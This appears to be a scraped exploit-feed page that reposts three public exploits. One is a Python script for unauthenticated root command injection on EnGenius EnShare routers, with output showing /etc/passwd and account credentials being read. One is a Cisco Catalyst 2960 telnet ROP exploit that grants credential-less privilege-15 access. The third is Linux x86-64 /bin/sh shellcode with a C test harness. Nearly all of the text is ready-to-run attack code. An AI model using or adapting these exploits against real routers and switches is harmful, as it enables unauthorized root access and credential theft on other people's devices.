#!/usr/bin/env python # coding: utf8 # # # EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution # # # Vendor: EnGenius Technologies Inc. # Product web page: https://www.engeniustech.com # Affected version: ESR300 (1.4.9, 1.4.7, 1.4.2, 1.4.1.28, 1.4.0, 1.3.1.42, 1.1.0.28) # ESR350 (1.4.11, 1.4.9, 1.4.5, 1.4.2, 1.4.0, 1.3.1.41, 1.1.0.29) # ESR600 (1.4.11, 1.4.9, 1.4.5, 1.4.3, 1.4.2, 1.4.1, 1.4.0.23, 1.3.1.63, 1.2.1.46, 1.1.0.50) # EPG5000 (1.3.9.21, 1.3.7.20, 1.3.3.17, 1.3.3, 1.3.2, 1.3.0, 1.2.0) # ESR900 (1.4.5, 1.4.3, 1.4.0, 1.3.5.18 build-12032015@liwei (5668b74), 1.3.1.26, 1.3.0, 1.2.2.23, 1.1.0) # ESR1200 (1.4.5, 1.4.3, 1.4.1, 1.3.1.34, 1.1.0) # ESR1750 (1.4.5, 1.4.3, 1.4.1, 1.4.0, 1.3.1.34, 1.3.0, 1.2.2.27, 1.1.0) # # Summary: With the EnGenius IoT Gigabit Routers and free EnShare app, use # your iPhone, iPad or Android-based tablet or smartphone to transfer # video, music and other files to and from a router-attached USB hard # drive. Enshare is a USB media storage sharing application that enables # access to files remotely. The EnShare feature allows you to access media # content stored on a USB hard drive connected to the router's USB port in # the home and when you are away from home when you have access to the Internet. # By default the EnShare feature is enabled. # # EnShareTM supports both FAT32 and NTFS USB formats. Transfer speeds of data # from your router-attached USB storage device to a remote/mobile device may # vary based on Internet uplink and downlink speeds. The router's design enables # users to connect numerous wired and wireless devices to it and supports intensive # applications like streaming HD video and sharing of media in the home and accessing # media away from the home with EnShare - Your Personal Media Cloud. # # Desc: EnGenius EnShare suffers from an unauthenticated command injection # vulnerability. An attacker can inject and execute arbitrary code as the # root user via the 'path' GET/POST parameter parsed by 'usbinteract.cgi' # script. # # ======================================================================= # # bash-4.4$ python enshare.py 10.0.0.17 # [+] Command: ls -alsh # 44 -rwxr-xr-x 1 0 0 42.5K Oct 31 2014 getsize.cgi # 4 -rwxr-xr-x 1 0 0 606 Oct 31 2014 languageinfo.cgi # 48 -rwxr-xr-x 1 0 0 44.2K Oct 31 2014 upload.cgi # 48 -rwxr-xr-x 1 0 0 44.5K Oct 31 2014 usbinfo.cgi # 56 -rwxr-xr-x 1 0 0 54.1K Oct 31 2014 usbinteract.cgi # 0 drwxr-xr-x 4 0 0 0 Jun 3 00:52 .. # 0 drwxr-xr-x 2 0 0 0 Oct 31 2014 . # # [+] Command: id # uid=0(root) gid=0(root) # # [+] Command: cat /etc/passwd # # Connecting to 10.0.0.17 port 9000 # # HTTP/1.1 200 OK # root: !:0:0:root:/root:/bin/sh # administrator: *:65534:65534:administrator:/var:/bin/false # admin: *:60000:60000:webaccount:/home:/usr/bin/sh # guest: *:60001:60000:webaccount:/home:/usr/bin/sh # Content-type: text/html # Transfer-Encoding: chunked # Date: Sat, 03 Jun 2017 13:48:14 GMT # Server: lighttpd/1.4.31 # # 0 # [+] Command: pwd # /www/web/cgi-bin # [+] Command: cat /etc/account.conf # # HTTP/1.1 200 OK # 1: admin:admin:4 # 1: guest:guest:1 # Content-type: text/html # Transfer-Encoding: chunked # Date: Sat, 03 Jun 2017 14:53:42 GMT # Server: lighttpd/1.4.31 # bash-4.4$ # # ======================================================================= # # Tested on: Linux 2.6.36 (mips) # Embedded HTTP Server ,Firmware Version 5.11 # lighttpd/1.4.31 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2017-5413 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php # # # 17.05.2017 # import sys, socket if len(sys.argv) < 2: print 'Usage: enshare.py [port]\n' quit() ip = sys.argv[1] port = 9000 if len(sys.argv) < 3 else int(sys.argv[2]) cmd = raw_input('[+] Command: ') payload = 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n' payload += 'Host: {0}:{1}\r\n' payload += 'Content-Length: {2}\r\n' payload += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n' payload += 'action=7&path=\"|{3}||\"' msg = payload.format( ip, port, len(cmd)+19, cmd ) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) target = (ip, port) print >>sys.stderr, '\nConnecting to %s port %s\n' % target s.connect(target) s.sendall(msg) response = s.recv(5000) s.close() print response.strip()
Categories: Exploits

Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution

SecurityLab.ru - Tue, 2017-06-06 01:39
#!/usr/bin/python # Author: # Artem Kondratenko (@artkond) import socket import sys from time import sleep set_credless = True if len(sys.argv) < 3: print sys.argv[0] + ' [host] --set/--unset' sys.exit() elif sys.argv[2] == '--unset': set_credless = False elif sys.argv[2] == '--set': pass else: print sys.argv[0] + ' [host] --set/--unset' sys.exit() s = socket.socket( socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 23)) print '[+] Connection OK' print '[+] Recieved bytes from telnet service:', repr(s.recv(1024)) #sleep(0.5) print '[+] Sending cluster option' print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication' payload = '\xff\xfa\x24\x00' payload += '\x03CISCO_KITS\x012:' payload += 'A' * 116 payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; #next bytes are shown as offsets from r1 payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34 if set_credless is True: payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1 else: payload += '\x00\x04\xea\x58' # unset payload += 'BBBB' # +16(+0) r1 points here at second gadget payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; payload += 'CCCC' # +8 payload += 'DDDD' # +12 payload += 'EEEE' # +16(+0) r1 points here at third gadget payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60 payload += 'FFFF' # +12 payload += 'GGGG' # +16(+0) r1 points here at fourth gadget payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; if set_credless: payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr; else: payload += '\x00\x04\xe6\xf0' # unset payload += 'HHHH' # +12 payload += 'IIII' # +16(+0) r1 points here at fifth gadget payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; payload += 'JJJJ' # +8 r1 points here at third gadget payload += 'KKKK' # +12 payload += 'LLLL' # +16 payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr payload += ':15:' + '\xff\xf0' s.send(payload) print '[+] All done' s.close()
Categories: Exploits

Linux/x86-64 - /bin/sh Shellcode (31 bytes)

SecurityLab.ru - Tue, 2017-06-06 01:36
/* ;Title: Linux/x86-64 - /bin/sh Shellcode ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x86_64 ;Description: This shellcode baased on "JMP CALL POP" method to Execute "/bin//sh". Length of shellcode is 31 bytes. ;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04) ===COMPILATION AND EXECUTION=== #nasm -f elf64 shell.asm -o shell.o #ld shell.o -o shell <=== Making Binary File #./bin2shell.sh shell <== xtract hex code from the binary(https://github.com/touhidshaikh/bin2shell) =================SHELLCODE(INTEL FORMAT)================= section .text global _start _start: jmp shell here: xor rax,rax pop rdi xor rsi,rsi xor rdx,rdx add rax,59 syscall shell: call here bash db "/bin//sh" ===================END HERE============================ Compile with gcc with some options. # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing */ #include #include unsigned char code[] = \ "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68"; main() { printf("Touhid Shaikh (http://www.touhidshaikh.com)\n"); printf("Shellcode Length : %d\n", (int)strlen(code)); int (*ret)() = (int(*)())code; ret(); }
Categories: Exploits
Syndicate content